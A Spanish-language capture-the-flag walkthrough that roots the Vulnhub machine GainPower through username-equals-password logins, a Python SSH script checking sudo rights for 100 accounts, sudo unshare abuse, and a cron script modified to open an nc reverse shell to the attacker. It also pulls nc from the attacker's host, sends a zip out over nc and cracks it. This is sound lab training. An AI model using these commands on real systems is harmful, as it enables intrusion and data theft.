[VLN] GainPower

Hoy vamos a hackear la maquina de Vulnhub llamada GainPower. Podeis descargarla desde el siguiente enlace: https://www.vulnhub.com/entry/gainpower-1,493/
  • Video
  • numeration
  • Empezamos con un nmap para ver que puertos tiene abiertos.
    sml@Cassandra:~$ nmap -A -p- 192.168.1.34 Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-30 11:53 CEST Nmap scan report for 192.168.1.34 Host is up (0.0016s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4 (protocol 2.0) | ssh-hostkey: | 2048 88:41:61:11:e1:1f:18:7d:d6:0c:38:29:25:79:16:2c (RSA) | 256 18:c5:fd:ce:cd:2b:92:f8:d9:17:17:21:24:9d:67:df (ECDSA) |_ 256 84:c5:14:e4:e9:33:21:41:6a:92:72:b9:a7:33:1a:ea (ED25519) 80/tcp open http Apache httpd 2.4.6 ((CentOS)) | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Apache/2.4.6 (CentOS) |_http-title: Watch shop | eCommers 8000/tcp open http Ajenti http control panel |_http-title: Ajenti Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 18.79 seconds
    Nos conectamos por ssh para ver si nos muestra algo.
    sml@Cassandra:~/tools$ ssh holi@192.168.1.34 Hi !!! THIS MESSAGE IS ONLY VISIBLE IN OUR NETWORK :) ___ _ ___ / __|__ _(_)_ _ | _ \_____ __ _____ _ _ | (_ / _` | | ' \ | _/ _ \ V V / -_) '_| \___\__,_|_|_||_| |_| \___/\_/\_/\___|_| I HOPE EVERYONE KNOW THE JOINING ID CAUSE THAT IS YOUR USERNAME : ie : employee1 employee2 ... ... ... so on ;) I already told the format of password of everyone in the yesterday's metting. Now i have configured everything. My request is to everyone to Complete assignments on time btw one of my employee have sudo powers because he is my favourite NOTE : "This message will automatically removed after 2 days" - BOSS holi@192.168.1.34's password:
    Podemos leer que los usuarios son del tipo employee1, employee2 etc... Tambien indica que el formato de password ya lo saben, y que uno de los usuarios tiene poderes "sudo". Sabiendo esto, y tras probar, nos podemos loguear usando la misma password que el nombre de usuario, es decir, nos podemos loguear usando employee1/employee1 o employee2/employee2 etc... Nos logueamos como employee1 para echar un primer vistazo.
  • Low Shell
  • sml@Cassandra:~$ ssh employee1@192.168.1.34 Hi !!! THIS MESSAGE IS ONLY VISIBLE IN OUR NETWORK :) ___ _ ___ / __|__ _(_)_ _ | _ \_____ __ _____ _ _ | (_ / _` | | ' \ | _/ _ \ V V / -_) '_| \___\__,_|_|_||_| |_| \___/\_/\_/\___|_| I HOPE EVERYONE KNOW THE JOINING ID CAUSE THAT IS YOUR USERNAME : ie : employee1 employee2 ... ... ... so on ;) I already told the format of password of everyone in the yesterday's metting. Now i have configured everything. My request is to everyone to Complete assignments on time btw one of my employee have sudo powers because he is my favourite NOTE : "This message will automatically removed after 2 days" - BOSS employee1@192.168.1.34's password: Last login: Tue Jun 30 18:01:37 2020 from cassandra.home [employee1@localhost ~]$
    Sabemos que hay un empleado que tiene privilegios sudo, asi que vamos a ver cuantos empleados hay.
    [employee1@localhost home]$ cat /etc/passwd | grep employ ---SNIP--- employee16:x:1015:1015::/home/employee16:/bin/bash employee51:x:1050:1050::/home/employee51:/bin/bash employee52:x:1051:1051::/home/employee52:/bin/bash employee97:x:1096:1096::/home/employee97:/bin/bash employee98:x:1097:1097::/home/employee98:/bin/bash employee99:x:1098:1098::/home/employee99:/bin/bash employee100:x:1099:1099::/home/employee100:/bin/bash ---SNIP---
    Vemos que hay 100... Preparamos un script en python que lo que hara sera loguearse como el usuario employeeX y ejecutara sudo para ver si tiene permisos o da un error. El script es el siguiente:
    #!/usr/bin/env python import paramiko def fuckme(seraeste): print seraeste l_password = seraeste l_host = "192.168.1.34" #MODIFY IP l_user = seraeste ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(l_host, username=l_user, password=l_password) transport = ssh.get_transport() session = transport.open_session() session.set_combine_stderr(True) session.get_pty() session.exec_command("sudo -l") stdin = session.makefile('wb', -1) stdout = session.makefile('rb', -1) stdin.write(l_password +'\n') stdin.flush() for line in stdout.read().splitlines(): print 'host: %s: %s' % (l_host, line) for x in range (1,101): yeah = "employee" + str(x) fuckme(yeah)
    Ejecutamos el script...
    sml@Cassandra:~$ python g.py ---SNIP--- host: 192.168.1.34: employee63 host: 192.168.1.34: [sudo] password for employee63: host: 192.168.1.34: Sorry, user employee63 may not run sudo on localhost. employee64 host: 192.168.1.34: employee64 host: 192.168.1.34: [sudo] password for employee64: host: 192.168.1.34: Matching Defaults entries for employee64 on localhost: host: 192.168.1.34: !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, host: 192.168.1.34: env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", host: 192.168.1.34: env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", host: 192.168.1.34: env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", host: 192.168.1.34: env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", host: 192.168.1.34: env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", host: 192.168.1.34: secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin host: 192.168.1.34: host: 192.168.1.34: User employee64 may run the following commands on localhost: host: 192.168.1.34: (programmer) /usr/bin/unshare employee65 host: 192.168.1.34: employee65 host: 192.168.1.34: [sudo] password for employee65: host: 192.168.1.34: Sorry, user employee65 may not run sudo on localhost. ---SNIP---
    Vemos que el usuario employee64 puede usar sudo! Nos logueamos con employee64/employee64.
    sml@Cassandra:~/tools$ ssh employee64@192.168.1.34 Hi !!! THIS MESSAGE IS ONLY VISIBLE IN OUR NETWORK :) ___ _ ___ / __|__ _(_)_ _ | _ \_____ __ _____ _ _ | (_ / _` | | ' \ | _/ _ \ V V / -_) '_| \___\__,_|_|_||_| |_| \___/\_/\_/\___|_| I HOPE EVERYONE KNOW THE JOINING ID CAUSE THAT IS YOUR USERNAME : ie : employee1 employee2 ... ... ... so on ;) I already told the format of password of everyone in the yesterday's metting. Now i have configured everything. My request is to everyone to Complete assignments on time btw one of my employee have sudo powers because he is my favourite NOTE : "This message will automatically removed after 2 days" - BOSS employee64@192.168.1.34's password: Last failed login: Tue Jun 30 08:05:27 EDT 2020 from cassandra.home on ssh:notty There were 677 failed login attempts since the last successful login. Last login: Mon May 18 08:59:41 2020 [employee64@localhost ~]$
    Una vez logueados, ejecutamos sudo -l para ver que podemos hacer.
    [employee64@localhost ~]$ sudo -l Matching Defaults entries for employee64 on localhost: !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin User employee64 may run the following commands on localhost: (programmer) /usr/bin/unshare
    Podemos usar unshare como el usuario programmer. Lo aprovechamos para obtener una shell como "programmer".
    [employee64@localhost ~]$ sudo -u programmer /usr/bin/unshare /bin/bash bash-4.2$ id uid=1182(programmer) gid=1184(prome) grupos=1184(prome) contexto=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
    Ahora que estamos como programmer, investigamos un poco mas el sistema.
    bash-4.2$ groups prome bash-4.2$ find / -group prome 2>/dev/null /proc/20325/timers /proc/20325/patch_state /tmp/back.txt /home/vanshal /media/programmer /media/programmer/scripts /media/programmer/scripts/backup.sh
    Vemos que pertenecemos al grupo "prome" y que dicho grupo puede modificar el script /media/programmer/scripts/backup.sh. Al lanzar pspy64 vemos que hay una tarea que ejecuta el script como el usuario vanshal (UID 1183).
    2020/06/30 08:55:01 CMD: UID=1183 PID=20604 | /bin/bash /media/programmer/scripts/backup.sh
    La maquina no tiene nc, asi que lo descargamos de nuestra maquina en su /tmp.
    bash-4.2$ wget http://192.168.1.148/nc --2020-06-30 08:57:03-- http://192.168.1.148/nc Conectando con 192.168.1.148:80... conectado. Petición HTTP enviada, esperando respuesta... 200 OK Longitud: 35520 (35K) [application/octet-stream] Grabando a: “nc” 100%[=========================================================================== ================================================>] 35.520 --.-K/s en 0s 2020-06-30 08:57:03 (574 MB/s) - “nc” guardado [35520/35520] bash-4.2$ chmod +x nc
    Modificamos el script para obtener una reverse shell.
    bash-4.2$ vi /media/programmer/scripts/backup.sh #agregamos /tmp/nc -e /bin/bash 192.168.1.148 5555
    Ponemos nc a la escucha.
    sml@Cassandra:~$ nc -nlvp 5555 listening on [any] 5555 ...
    Y tras esperar...
    sml@Cassandra:~$ nc -nlvp 5555 listening on [any] 5555 ... connect to [192.168.1.148] from (UNKNOWN) [192.168.1.34] 33524 id uid=1183(vanshal) gid=1184(prome) groups=1184(prome) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 python -c 'import pty; pty.spawn("/bin/bash")' [vanshal@localhost ~]$
  • local.txt
  • [vanshal@localhost ~]$ ls local.txt secret.zip [vanshal@localhost ~]$ cat local.txt You successfully owned the user of this box :-) Best of Luck for the root flag: 5c2a29d7b95868da9e503502f301e8dd Twitter : VanshalG
    Vemos que hay un fichero llamado secret.zip. Utilizamos nc para transferirlo a nuestra maquina y poder crackearlo. En nuestra maquina ejecutamos:
    sml@Cassandra:~$ nc -lp 1234 > secret.zip
    En la victima:
    [vanshal@localhost ~]$ /tmp/nc -w 3 192.168.1.148 1234 < secret.zip
    Una vez tenemos el fichero .zip, crackeamos la password:
    sml@Cassandra:~$ fcrackzip -v -u -D -p rockyou.txt secret.zip found file 'Mypasswords.txt', (size cp/uc 243/ 257, flags 9, chk 7f46) PASSWORD FOUND!!!!: pw == 81237900
    Descomprimimos el fichero....
    sml@Cassandra:~$ unzip secret.zip Archive: secret.zip [secret.zip] Mypasswords.txt password: inflating: Mypasswords.txt
    Miramos el contenido.
    sml@Cassandra:~$ cat Mypasswords.txt aTQ!vYxQUh3$&uaN3p%@_ax#Ab2XNZ!5$rFh$@bDMyxt#&Q2L&4+DvDT?A!MPKK9sFq-V8_d$5gQLKyK hf-4&S=_m^Cx?bZYf8Bv%%*H^GcvDc4ayfPk^HWs8bnD%Ayk3$5WP6_K?a6_%MF&e-DS2ZZ$m93BL3CY !huQDM2-JZcMSMKT8K*Z7zLPGATU7JP&x#JtaZHAbM^%$TK%C3ubXV4#e87M6P-puXTTMbzuP5y4qX6U zd%ed8Ux_vMX=pCB
  • Privilege Escalation
  • Vemos un string que podria ser un hash... pero no lo es :) Vamos a http://192.168.1.34:8000 y de credenciales usamos root/(el contenido de Mypasswords.txt) Si... era el password :) En la parte izquierda vamos a "Terminal", y luego en el cuadrado superior derecho escribimos "/bin/bash", por ultimo hacemos click en el boton "Run" y se nos abrira una terminal "web" como root.
  • root.txt
  • [root@localhost root]# ls proof.txt [root@localhost root]# cat proof.txt You successfully owned the root of this box :-) Flag: eb2e174c3883ff6b5fd871167795b4d6 Twitter : VanshalG
  • End
  • Y con esto ya seriamos root de la maquina :)